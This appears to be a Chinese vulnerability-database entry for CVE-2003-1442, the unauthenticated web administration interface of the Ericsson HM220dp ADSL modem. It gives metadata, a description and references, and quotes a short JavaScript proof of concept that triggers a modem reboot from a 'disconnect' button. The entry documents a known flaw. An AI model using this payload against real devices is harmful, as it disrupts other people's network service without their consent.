HM220dp ADSL modem WEB管理接口不安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107195 漏洞类型 授权问题
发布时间 2003-02-11 更新时间 2003-12-31
CVE编号 CVE-2003-1442 CNNVD-ID CNNVD-200312-404
漏洞平台 Hardware CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22244
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-404
|漏洞详情
EricssonHM220dp是一款小型办公环境ADSLMODEM。EricssonHM220dp的WEB接口没有访问控制机制,远程攻击者可以利用这个漏洞访问WEB接口管理页面,进行各种恶意活动。EricssonHM220dp的管理可以通过多种方式,包括基于WEB的接口,不过默认WEB接口不需要验证,因此未授权用户可以访问WEB管理页面,对ADSLMODEM进行配置。
|漏洞EXP
source: http://www.securityfocus.com/bid/6824/info

The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. 

[script]
function exploit(){
window.location = "view-source:http://www.example.com/dummy.html?reboot=1";
}
[/script]
[input type="button" value="disconnect" onClick="exploit();"]
|参考资料

来源:BID
名称:6824
链接:http://www.securityfocus.com/bid/6824
来源:XF
名称:ericsson-hm220dp-auth-bypass(11290)
链接:http://xforce.iss.net/xforce/xfdb/11290
来源:BUGTRAQ
名称:20030225RE:EricssonHM220dpADSLmodemInsecureWebAdministrationVulne
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104619331706574&w=2
来源:BUGTRAQ
名称:20030211EricssonHM220dpADSLmodemInsecureWebAdministrationVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0127.html
来源:NSFOCUS
名称:4361
链接:http://www.nsfocus.net/vulndb/4361